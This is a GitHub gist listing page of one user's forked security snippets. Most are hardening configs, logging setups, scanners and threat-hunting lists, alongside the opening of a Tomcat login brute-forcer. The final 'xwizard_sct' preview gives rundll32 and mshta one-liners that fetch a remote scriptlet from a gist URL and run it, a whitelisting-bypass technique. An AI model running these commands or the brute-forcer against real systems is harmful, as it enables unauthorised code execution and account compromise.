Tuan T tuantmb
😹
tuantmb
/ EnableAMSILogging.ps1
Created
April 2, 2019 15:33
— forked from mattifestation/EnableAMSILogging.ps1
Enables AMSI logging to the AMSI/Operational event log
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Run this elevated, reboot, boom. | |
| # Feel free to name this whatever you want | |
| $AutoLoggerName = 'MyAMSILogger' | |
| $AutoLoggerGuid = "{$((New-Guid).Guid)}" | |
| New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled | |
| Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41 |
tuantmb
/ tomcat_bruteforce.py
Created
April 4, 2019 02:04
— forked from th3gundy/tomcat_bruteforce.py
Tomcat manager console bruteforce
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Tomcat bruteforce | |
| Author: @itsecurityco | |
| """ | |
| import os | |
| import sys | |
| import getopt | |
| import base64 | |
| import requests |
tuantmb
/ firewall.sh
Created
May 3, 2019 05:37
— forked from trevorparker/firewall.sh
A basic starting template for iptables firewall rules.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| ### | |
| # IPv4 | |
| ### | |
| # Flush and remove chains | |
| /sbin/iptables -F | |
| /sbin/iptables -X | |
| # Set default policies |
tuantmb
/ audit.rules
Created
June 11, 2019 04:59
— forked from Neo23x0/audit.rules
Linux Auditd Best Practice Configuration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # IMPORTANT! | |
| # This gist has been transformed into a github repo | |
| # You can find the most recent version there: | |
| # https://github.com/Neo23x0/auditd | |
| # ___ ___ __ __ | |
| # / | __ ______/ (_) /_____/ / | |
| # / /| |/ / / / __ / / __/ __ / | |
| # / ___ / /_/ / /_/ / / /_/ /_/ / | |
| # /_/ |_\__,_/\__,_/_/\__/\__,_/ |
tuantmb
/ nginx.conf
Created
June 21, 2019 08:17
— forked from plentz/nginx.conf
Best nginx configuration for improved security(and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # to generate your dhparam.pem file, run in the terminal | |
| openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048 |
tuantmb
/ audit.rules
Created
July 10, 2019 08:30
— forked from coh7eiqu8thaBu/audit.rules
Linux Auditd Best Practice Configuration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Linux Audit Daemon - Best Practice Configuration | |
| # /etc/audit/audit.rules | |
| # | |
| # Based on rules published here: | |
| # Gov.uk auditd rules | |
| # https://github.com/gds-operations/puppet-auditd/pull/1 | |
| # CentOS 7 hardening | |
| # https://highon.coffee/blog/security-harden-centos-7/#auditd---audit-daemon | |
| # Linux audit repo | |
| # https://github.com/linux-audit/audit-userspace/tree/master/rules |
tuantmb
/ pulseversion.py
Created
August 19, 2019 05:06
— forked from rxwx/pulseversion.py
Pulse Secure Version Scanner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import re | |
| HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"} | |
| if len(sys.argv) != 2: | |
| print " Usage: python pulseversion.py <target ip/domain>" | |
| sys.exit(1) |
tuantmb
/ Native-Windows-Useragents-malicious.txt
Created
August 21, 2019 04:11
— forked from GossiTheDog/Native-Windows-Useragents-malicious.txt
Native Windows UserAgents for Threat Hunting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Invoke-WebRequest in Powershell - manually whitelist legit content first: | |
| Mozilla/*WindowsPowerShell/* | |
| System.Net.WebClient.DownloadFile(): | |
| None | |
| //Start-BitsTransfer - manually whitelist legit content first: | |
| Microsoft BITS/* | |
| //certutil.exe - manually whitelist legit content first: |
tuantmb
/ find-https-debian-archives.py
Created
October 23, 2019 08:48
— forked from eighthave/find-https-debian-archives.py
Script to find official Debian mirrors that support HTTPS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import urllib.request | |
| import re | |
| import ssl | |
| import sys | |
| # # find generic mirrors | |
| mirrors = urllib.request.urlopen('http://www.debian.org/mirror/list') | |
| https = [] |
tuantmb
/ instructions.txt
Created
November 1, 2019 03:54
— forked from NickTyrer/instructions.txt
xwizard_sct
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | |
| verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC} | |
| create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC} | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close(); | |
| mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close(); |